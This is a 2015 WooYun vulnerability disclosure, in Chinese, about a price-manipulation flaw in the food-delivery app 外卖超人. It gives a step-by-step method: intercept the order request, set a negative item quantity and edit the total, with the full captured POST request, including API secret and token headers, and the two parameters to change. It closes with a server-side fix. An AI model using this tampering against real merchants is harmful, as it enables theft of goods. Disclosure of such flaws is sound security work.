当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145833

漏洞标题:外卖超人修改金额最低可1元吃大餐

相关厂商:爱餐商务咨询有限公司

漏洞作者: 月神

提交时间:2015-10-12 12:00

修复时间:2015-11-26 12:02

公开时间:2015-11-26 12:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可以修改订单中数据,最低可1元无限购买。

详细说明:

1.打开外卖超人APP
2.使用封包工具截取订单信息(WPE、charles均可)
3.提交订单时截取数据(点击结算)
POST /api/v2/order/create/ HTTP/1.1..X-ApiSecret: 9bdac88ccf0c74cf7878f589757eebd0..If-None-Match: "32e80791f1566b77f8cce91303cbb9ca"..X-token: b87921470408cee78bd5a6e9246f4cd0..User-Agent: Android/MI NOTE Pro/5.0.2/yogiyo-android-4.4.1..If-Modified-Since: Sat, 10 Oct 2015 08:21:57 GMT+00:00..X-ApiKey: android..Content-Type: application/json charset=uft-8..Host: waimaichaoren.com..Connection: Keep-Alive..Accept-Encoding: gzip..Content-Length: 322....menu_items=[{"id":2797148,"p":"39.50","q":-8,"opts":[]},{"id":2797166,"p":"31.00","q":11,"opts":[]}]&lang=zh&order_source=android&delivery_fee=8.0&restaurant_id=33925&addition_data={}&location_id=11707169&menu_items_total=025.0&
3.修改数量:q:-8(我是用wpe修改的)
4.在定11份31块钱的,这样39.5*-8+31*11+8元外送费=33元,而实际送来的是19份饭。

3.jpg


4.png

漏洞证明:

4.png

1.png


使用wpe修改外卖超人app结算的订单即可,图片已经很详细了,封包的内容也全部附上了。
"p":"39.50","q":-8,
menu_items_total=025.0
修改这两个参数:Q=-8(数量) 和 menu_items_total=025.0(金额)

修复方案:

服务器验证商品数量不可以为负

版权声明:转载请注明来源 月神@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价